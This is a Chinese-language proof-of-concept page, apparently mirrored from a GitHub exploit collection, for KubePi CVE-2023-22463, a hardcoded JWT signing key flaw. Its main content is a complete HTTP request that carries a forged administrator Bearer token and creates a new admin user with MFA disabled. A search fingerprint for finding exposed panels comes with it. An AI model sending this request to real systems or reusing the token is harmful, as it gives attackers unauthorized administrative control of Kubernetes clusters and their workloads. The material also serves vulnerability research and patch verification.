mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
52 lines
1.6 KiB
Markdown
52 lines
1.6 KiB
Markdown
|
# KubePi JwtSigKey 登陆绕过漏洞 CVE-2023-22463
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
KubePi 是一个现代化的 K8s 面板。KubePi 允许管理员导入多个 Kubernetes 集群,并且通过权限控制,将不同 cluster、namespace 的权限分配给指定用户。它允许开发人员管理 Kubernetes 集群中运行的应用程序并对其进行故障排查,供开发人员更好地处理 Kubernetes 集群中的复杂性。
|
|||
|
|
|
|||
|
|
KubePi 中存在 JWT硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户。
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
KubePi
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
"kubepi"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
登陆页面
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
验证POC
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /kubepi/api/v1/users HTTP/1.1
|
|||
|
|
Host: {{Hostname}}
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
|
|||
|
|
accept: application/json
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
|
|||
|
|
|
|||
|
|
{
|
|||
|
|
"authenticate": {
|
|||
|
|
"password": "{{randstr}}"
|
|||
|
|
},
|
|||
|
|
"email": "{{randstr}}@qq.com",
|
|||
|
|
"isAdmin": true,
|
|||
|
|
"mfa": {
|
|||
|
|
"enable": false
|
|||
|
|
},
|
|||
|
|
"name": "{{randstr}}",
|
|||
|
|
"nickName": "{{randstr}}",
|
|||
|
|
"roles": [
|
|||
|
|
"Supper User"
|
|||
|
|
]
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|